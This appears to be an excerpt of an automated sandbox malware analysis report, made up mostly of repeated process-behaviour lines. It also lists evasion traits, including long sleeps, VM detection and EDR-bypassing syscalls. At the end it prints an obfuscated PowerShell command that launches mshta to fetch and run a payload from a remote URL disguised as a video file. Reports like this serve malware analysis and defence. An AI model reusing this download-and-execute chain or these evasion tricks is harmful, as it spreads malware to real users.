Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\bdd.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2110Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1024Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1127Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1101Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4023Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5751Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 6424Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 6424Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6972Thread sleep count: 2110 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6980Thread sleep count: 1024 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4072Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5816Thread sleep count: 1127 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5816Thread sleep count: 1101 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5732Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1260Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6976Thread sleep time: -11990383647911201s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: mshta.exe, 00000005.00000003.2877286551.00000154F1D2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2882216355.00000154F1D4E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2877918246.00000154F1D2D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2885295855.00000154F1D4F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2883951873.00000154F1DC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2885669706.00000154F1DC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2876123096.00000154F1DC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2881397937.00000154F1D2D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3582119522.0000028796E41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3582173272.0000028796E5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3580567588.0000028791624000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: mshta.exe, 00000005.00000003.2880735894.0000015CF87AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: ssh.exe, 00000000.00000002.2889964297.0000017B073E9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2862522108.000001EEDBA6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\AppData\Roaming\bdd.exeNtQuerySystemInformation: Indirect: 0x4AB00C
Source: C:\Users\user\AppData\Roaming\bdd.exeNtQuerySystemInformation: Direct from: 0x2E8
Source: C:\Users\user\AppData\Roaming\bdd.exeNtAllocateVirtualMemory: Direct from: 0x7FFEA3DADC6B
Source: C:\Users\user\AppData\Roaming\bdd.exeNtQuerySystemInformation: Indirect: 0x4AAF3E
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command 'kqOxxi}}=eH>Yz1>9jmshta https://static.klipxuhaq.shop/BUX6P.mp4kqOxxi}}=eH>Yz1>9j'.SubString(18, 45)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://static.klipxuhaq.shop/BUX6P.mp4"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://static.klipxuhaq.shop/BUX6P.mp4Jump to behavior
